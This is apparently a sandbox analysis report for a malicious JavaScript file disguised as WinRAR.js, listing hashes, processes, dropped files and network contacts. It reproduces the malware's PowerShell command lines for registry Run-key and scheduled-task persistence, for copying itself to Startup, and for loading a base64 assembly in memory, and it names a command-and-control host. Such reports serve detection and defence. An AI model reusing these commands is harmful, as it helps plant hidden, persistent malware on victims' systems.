Field | Value
---|---
File name | WinRAR.js
Full analysis | https://app.any.run/tasks/62efad4f-2732-4a94-bd86-5ab9897b0bd6
Verdict | Malicious activity
Analysis date | March 21, 2019, 11:05:03
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators | —
MIME | text/plain
File info | ASCII text, with very long lines, with no line terminators
MD5 | 1A443C2FEE7C2032549BDEFC98F0E9E0
SHA1 | 17805B746673B6DBF8AD71F4DD2EA220A598C486
SHA256 | 6BBC1C68A93077B02A6FD2AA8244429449D4E577C2FADDEBA1E4DD7E234EEEB1
SSDEEP | 768:kzivJcDFoQ0SbzPrZdmuAgme0wfjLp0LGo9/FT7cH4VZsmU/EkVz7TMpSjVFGvqn:kzifQ0ynZdqvOfjIj9/j/sXr7hjVAvZ0
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
688 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\WinRAR.js" | C:\Windows\System32\WScript.exe | — | explorer.exe
3288 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'FileName' -value 'C:\Users\admin\AppData\Local\Temp\WinRAR.js' -PropertyType String -Force;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe
3596 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "schtasks /create /sc minute /mo 45 /tn start /tr 'C:\Users\admin\AppData\Local\Temp\WinRAR.js'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe
1788 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\WinRAR.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Local\Temp\WinRAR.js'))" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe
2032 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'start').start;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe
4044 | "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 45 /tn start /tr C:\Users\admin\AppData\Local\Temp\WinRAR.js | C:\Windows\system32\schtasks.exe | — | powershell.exe

PID | User | Company | Integrity Level | Description | Exit code | Version
---|---|---|---|---|---|---
688 | admin | Microsoft Corporation | MEDIUM | Microsoft ® Windows Based Script Host | 0 | 5.8.7600.16385
3288 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | — | 6.1.7600.16385 (win7_rtm.090713-1255)
3596 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | — | 6.1.7600.16385 (win7_rtm.090713-1255)
1788 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | — | 6.1.7600.16385 (win7_rtm.090713-1255)
2032 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | — | 6.1.7600.16385 (win7_rtm.090713-1255)
4044 | admin | Microsoft Corporation | MEDIUM | Manages scheduled tasks | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3288 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MWAK91PDW31308ICV10H.temp | — | — | —
3596 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6GB03FVLR7612KR42GYN.temp | — | — | —
1788 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IKWI0IRF42WCPMMIQGFY.temp | — | — | —
2032 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QQ0ZSVQPHNHNRS4G58D1.temp | — | — | —
3288 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf8b5e.TMP | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
1788 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf8bcc.TMP | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
3596 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
1788 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
1788 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinRAR.js | text | 1A443C2FEE7C2032549BDEFC98F0E9E0 | 6BBC1C68A93077B02A6FD2AA8244429449D4E577C2FADDEBA1E4DD7E234EEEB1
2032 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf8bdb.TMP | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2032 | powershell.exe | 104.20.208.21:443 | pastebin.com | Cloudflare Inc | US | shared |
2032 | powershell.exe | 194.5.97.145:21000 | holydns.warzonedns.com | — | FR | malicious |
Domain | IP | Reputation
---|---|---
pastebin.com | — | shared
holydns.warzonedns.com | — | malicious